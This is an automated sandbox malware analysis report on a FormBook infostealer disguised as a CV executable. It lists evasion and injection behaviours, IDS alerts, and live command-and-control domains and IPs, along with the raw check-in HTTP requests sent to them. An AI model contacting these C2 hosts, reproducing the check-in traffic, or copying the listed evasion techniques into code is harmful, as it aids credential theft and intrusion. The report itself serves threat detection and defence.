Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Maryam Farokhi-PhD- CV-1403.exe

Overview

General Information

Sample name:Maryam Farokhi-PhD- CV-1403.exe
Analysis ID:1553733
MD5:de148dc1610a111af0b004e4d0d851a4
SHA1:5ac1d2f9bd4934240c7de727bf1e42c3eab7b257
SHA256:47b2857258f743ca87c19d38ebec95a1bc1c0490341ad9f08560529bfcb861e1
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • Maryam Farokhi-PhD- CV-1403.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe" MD5: DE148DC1610A111AF0B004E4D0D851A4)
    • Maryam Farokhi-PhD- CV-1403.exe (PID: 5192 cmdline: "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe" MD5: DE148DC1610A111AF0B004E4D0D851A4)
      • ptzMmYcrKro.exe (PID: 7128 cmdline: "C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6688 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • ptzMmYcrKro.exe (PID: 7940 cmdline: "C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1368 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-11T17:01:01.043848+010020507451Malware Command and Control Activity Detected192.168.11.204974685.159.66.9380TCP
                2024-11-11T17:01:24.537105+010020507451Malware Command and Control Activity Detected192.168.11.20497503.33.130.19080TCP
                2024-11-11T17:01:37.974891+010020507451Malware Command and Control Activity Detected192.168.11.20497543.33.130.19080TCP
                2024-11-11T17:01:52.348543+010020507451Malware Command and Control Activity Detected192.168.11.2049758185.68.16.9480TCP
                2024-11-11T17:02:05.773871+010020507451Malware Command and Control Activity Detected192.168.11.2049762199.59.243.22780TCP
                2024-11-11T17:02:20.040926+010020507451Malware Command and Control Activity Detected192.168.11.2049766192.64.118.22180TCP
                2024-11-11T17:02:34.538500+010020507451Malware Command and Control Activity Detected192.168.11.2049770154.23.184.9580TCP
                2024-11-11T17:02:48.097162+010020507451Malware Command and Control Activity Detected192.168.11.204977413.248.169.4880TCP
                2024-11-11T17:03:01.548411+010020507451Malware Command and Control Activity Detected192.168.11.20497783.33.130.19080TCP
                2024-11-11T17:03:15.045527+010020507451Malware Command and Control Activity Detected192.168.11.20497823.33.130.19080TCP
                2024-11-11T17:03:28.518727+010020507451Malware Command and Control Activity Detected192.168.11.20497873.33.130.19080TCP
                2024-11-11T17:03:42.595445+010020507451Malware Command and Control Activity Detected192.168.11.204979145.79.252.9480TCP
                2024-11-11T17:03:57.211155+010020507451Malware Command and Control Activity Detected192.168.11.204979543.156.106.10980TCP
                2024-11-11T17:04:11.374664+010020507451Malware Command and Control Activity Detected192.168.11.20497993.33.130.19080TCP
                2024-11-11T17:04:25.018148+010020507451Malware Command and Control Activity Detected192.168.11.2049803104.21.56.1380TCP
                2024-11-11T17:04:42.828035+010020507451Malware Command and Control Activity Detected192.168.11.204980485.159.66.9380TCP
                2024-11-11T17:04:57.152971+010020507451Malware Command and Control Activity Detected192.168.11.20498083.33.130.19080TCP
                2024-11-11T17:05:10.455044+010020507451Malware Command and Control Activity Detected192.168.11.20498123.33.130.19080TCP
                2024-11-11T17:05:24.333100+010020507451Malware Command and Control Activity Detected192.168.11.2049816185.68.16.9480TCP
                2024-11-11T17:05:37.604291+010020507451Malware Command and Control Activity Detected192.168.11.2049820199.59.243.22780TCP
                2024-11-11T17:05:51.695304+010020507451Malware Command and Control Activity Detected192.168.11.2049824192.64.118.22180TCP
                2024-11-11T17:06:06.273646+010020507451Malware Command and Control Activity Detected192.168.11.2049828154.23.184.9580TCP
                2024-11-11T17:06:19.588475+010020507451Malware Command and Control Activity Detected192.168.11.204983213.248.169.4880TCP
                2024-11-11T17:06:32.861007+010020507451Malware Command and Control Activity Detected192.168.11.20498363.33.130.19080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Maryam Farokhi-PhD- CV-1403.exeReversingLabs: Detection: 36%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: Maryam Farokhi-PhD- CV-1403.exeJoe Sandbox ML: detected
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: qesm.pdb source: Maryam Farokhi-PhD- CV-1403.exe
                Source: Binary string: qesm.pdbSHA256 source: Maryam Farokhi-PhD- CV-1403.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ptzMmYcrKro.exe, 00000003.00000000.29988243564.0000000000A8E000.00000002.00000001.01000000.0000000A.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33208908459.0000000000A8E000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: wntdll.pdbUGP source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30076327355.0000000003298000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30072902814.00000000030ED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Maryam Farokhi-PhD- CV-1403.exe, Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30076327355.0000000003298000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30072902814.00000000030ED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netbtugc.pdb source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000003.32061041259.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: netbtugc.pdbGCTL source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000003.32061041259.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C6C5F0 FindFirstFileW,FindNextFileW,FindClose,4_2_02C6C5F0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_02C59EE0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_037904E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49746 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49750 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49770 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49758 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49762 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49778 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49754 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49782 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49803 -> 104.21.56.13:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49808 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49824 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49832 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49812 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49791 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49836 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49766 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49774 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49804 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49799 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49787 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49795 -> 43.156.106.109:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49816 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49828 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49820 -> 199.59.243.227:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.kikaraofficial.xyz
                Source: DNS query: www.ergeneescortg.xyz
                Source: Joe Sandbox ViewIP Address: 192.64.118.221 192.64.118.221
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: global trafficHTTP traffic detected: GET /lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.kikaraofficial.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.6686vi38.appConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.7fh27o.vipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.redex.funConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.havan-oficial.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.oriony.liveConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.wcp95.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /a5kc/?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.thesquare.worldConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.bocadolobopetra.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /ywsl/?IBQP=53+vd04YW42mc36XCB5F63IhABrVfiuEAy5fmEaureJqNK/sdjqjQsdG685okMjqTRenKpUPfuASSj1yCn6YHCZWeE+kvE1krRyqLOvcoxG1FUsRKY0MVeU=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.rmzl-0.restConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /jwt5/?Lr3=uHMLTHRPCpsdapr&IBQP=BaBowTLo1loeAIpV7vVht/vx80fLXkEoZngrzLsBdCIsVeqAfJzss3Y0HZ2vI18y1WvYWAn/Doi+9ZPlOuIBlgbOtHjG5I6MGjR7KAsuAsv6BFY+Gayvzv4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.imgiu9.vipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn+6NyL3nxueSJAzVs8h9i9KFJmzD+/RgmGnJLg06gAUSOGsu+lNFioW5q3ewPUsSx7AySWAK21Xanb2Bs=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.premium303max.restConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /b38f/?Lr3=uHMLTHRPCpsdapr&IBQP=bEFn1h4TP97N18vCV7hUSjQIw4xMCEiPOnxtd8TYUawWIUuQfEmQCzCpa8YGfjn2jzwpUjFtNFjvXW/GU7b/pArgs0VIIQFXbRT3NlDEhxKin43O/dcn81w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.155n8etsy.autosConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /p1mo/?IBQP=4wGzyQ46QtXMw/BiLxl50NSbRJkEXxvch2IDA2BJPHfHfbxP6FqXRmBz/NN34NJsAG76ANum8i9g0X63XtdlCgxrKmACcwyugocACNeebq+1bjmsZbXe4Lk=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.uppercrust.clubConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.kikaraofficial.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.6686vi38.appConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
